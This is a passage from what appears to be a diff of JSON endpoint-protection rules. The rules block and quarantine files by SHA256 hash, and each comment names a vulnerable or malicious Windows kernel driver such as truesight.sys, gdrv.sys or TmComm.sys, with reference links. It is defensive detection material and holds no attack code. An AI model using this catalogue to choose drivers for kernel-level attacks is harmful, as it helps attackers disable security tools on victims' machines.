"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617149Z", + "creation_date": "2026-03-23T11:45:29.617151Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617156Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7841ee6dac956cc0923368d6722063a19c9fa131e55c6f3b7484cce78d826f0", + "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) 
[https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfc56eea-275a-59e9-8931-ed4badd8e632", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143853Z", + "creation_date": "2026-03-23T11:45:32.143855Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143861Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6a5ef968bd0e47e1ca9433f8e8d0b9bed0aa0a3baf982fdc27b1cc3b4b857b8", + "comment": "Vulnerable Kernel Driver (aka wnbios.sys) [https://www.loldrivers.io/drivers/baa168cd-eba2-42e4-95e9-47cb4b2f9094/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfce2f03-01d9-557c-80ee-bf0cce65bf79", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487891Z", + "creation_date": "2026-03-23T11:45:31.487893Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487898Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7ce4ba2b520f8fc976a61f918d2f45affae7c9ea7cdaaeda17b820bdb2403a4f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfd2c98b-f642-5ab4-b12a-59d6236a39f5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.978301Z", + "creation_date": "2026-03-23T11:45:29.978302Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.978308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533", + "comment": "Vulnerable Kernel Driver (aka nt5.sys) [https://www.loldrivers.io/drivers/193df066-c27c-4343-a4eb-ad2ac417a4cc/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfdc6746-3d3c-5cf3-9ca7-693ecf696f1c", + "test_maturity_current_count": 0, + "test_maturity_delay": 
7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813533Z", + "creation_date": "2026-03-23T11:45:31.813536Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813545Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3e6015aad30c38d738387901350ea9ac362c09fb6e95c5cf2121b071a03a3d0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfde6dd4-0ebd-5112-8755-67dcf74f1eb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141716Z", + "creation_date": "2026-03-23T11:45:31.141718Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141723Z", + "rule_level": null, + "rule_level_override": 
null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3f6274c200454803cc82c9d595750fd7a0ad7f10ded56c42b3e42011024fea87", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfedc4ce-2464-5073-8e41-51b0167a1138", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155984Z", + "creation_date": "2026-03-23T11:45:31.155986Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bf392302c14e22524c7fba846f62db690bbb0658a587d5025b7b9782e629a727", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bff29c72-5b94-58b4-9bf3-e4050d3d7f06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980046Z", + "creation_date": "2026-03-23T11:45:29.980049Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980054Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a47b9af109988e8e033886638edc84964968eecd0d24483eafaad6a6d68005ea", + "comment": "Malicious Kernel Driver (aka wantd.sys) [https://www.loldrivers.io/drivers/892292f9-b87c-40a5-80e5-8c9b02914e8b/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "bfffad42-0996-5acf-b852-93d126b84b8c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826425Z", + "creation_date": "2026-03-23T11:45:30.826427Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7716c3c62cf88db90fcd0b60854479a16dded16c91812544a77db3121f2eb8bd", + "comment": 
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c00856ea-bf67-511c-843d-4b76f615c7ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827218Z", + "creation_date": "2026-03-23T11:45:30.827220Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827225Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dfd936baaeb51542d04609043ed166b6a2a4e826e5e0e506757e8960fa3b03de", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c009df39-95fb-5c7a-9556-8ed074067f80", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976853Z", + "creation_date": "2026-03-23T11:45:29.976855Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976860Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a149695e1eeef8c4728f091be7d64304d7e00c8a2f27adc7d96a111de15a79b", + "comment": "Malicious Windows Kernel Explorer Driver (aka WindowsKernelExplorer.sys) [https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c00f329c-e5af-5a5a-81da-fc09c6df712b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827049Z", + "creation_date": "2026-03-23T11:45:31.827051Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827057Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17308b1c03775e40fc1b37d8414502c81624b4d52c04875e8de1a496eccb808d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c01739ab-02b7-5ec3-a457-442a4c6769b3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148677Z", + "creation_date": "2026-03-23T11:45:31.148679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "930e0cf02d9a9146b1dd20c76f66826b624ead0e06cfd846d72bd7db61b2a086", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c01a4dc9-1302-5a55-b7f9-435fa669fe99", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.609076Z", + "creation_date": 
"2026-03-23T11:45:29.609078Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.609083Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81aafae4c4158d0b9a6431aff0410745a0f6a43fb20a9ab316ffeb8c2e2ccac0", + "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c01a6684-9ee9-5967-8bad-a32d96b9074a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.142611Z", + "creation_date": "2026-03-23T11:45:31.142613Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.142618Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d91d3ab359d4a166dac86de0ce5a1fbed39f4ca088e0b86f84c7c8939e6a7692", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c0232b97-f92b-5e42-a6b0-741e624acf8f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.821413Z", + "creation_date": "2026-03-23T11:45:30.821417Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.821426Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d474ea066d416ded9ed8501c285ca6b1c26a1d1c813c8f6bd5523eeb66c5d01e", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c0279a45-b00d-5e31-9adc-0a565c41d537", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977532Z", + "creation_date": "2026-03-23T11:45:29.977534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977540Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a334bdf0c0ab07803380eb6ef83eefe7c147d6962595dd9c943a6a76f2200b0d", + "comment": "Vulnerable Kernel Driver (aka CorsairLLAccess64.sys) [https://www.loldrivers.io/drivers/a9d9cbb7-b5f6-4e74-97a5-29993263280e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c02ae058-2788-5b39-93bb-7c9ab9faf70c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145677Z", + "creation_date": "2026-03-23T11:45:31.145679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145684Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9ace913c9b494fd607a1e60796ad768ea1b61ff134d1e58b96843ebdb43986a3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c0478a06-a376-5c77-bfa5-8ac95f61709a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.145200Z", + "creation_date": "2026-03-23T11:45:31.145202Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.145208Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b6e6cd2ae8ffbda7595f079535e30b68f5d0586d3cdf0f263eb5ef403ec592c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c05c8cac-7038-58de-84be-4d7787d7027b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826104Z", + "creation_date": "2026-03-23T11:45:30.826107Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa30e85ea2288f721cbd2bc158aa616d0aac2f5695597e61179972581484324e", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c05f1553-a658-5062-a37a-1285888edd5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974229Z", + "creation_date": "2026-03-23T11:45:29.974231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974237Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cf0855a8517be550b08a981bfacf90f245791cd70620868a241f1b1e2d8dfd89", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "c05f71b9-73d9-5bc4-8e07-8b990c448a1f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:30.481308Z",
+ "creation_date": "2026-03-23T11:45:30.481310Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481316Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cd57abaf2f20ea5b3f56db1193cb3772aa09bb2be3c4fa8001e7cf72ae1f078c",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c068b9b7-4ed1-5fb3-8ec2-abc81e31e000",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827647Z",
+ "creation_date": "2026-03-23T11:45:30.827649Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827654Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "00e6fc33ba9861f673f857c74e65d65e90702013705e5170f4680565956c02ee",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c06cc91d-e589-5365-b939-a66a40f21754",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616550Z",
+ "creation_date": "2026-03-23T11:45:29.616553Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616558Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffc72f0bde21ba20aa97bee99d9e96870e5aa40cce9884e44c612757f939494f",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "c0716296-abc4-555e-a39a-5ba2e48fecdc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462143Z",
+ "creation_date": "2026-03-23T11:45:30.462146Z",
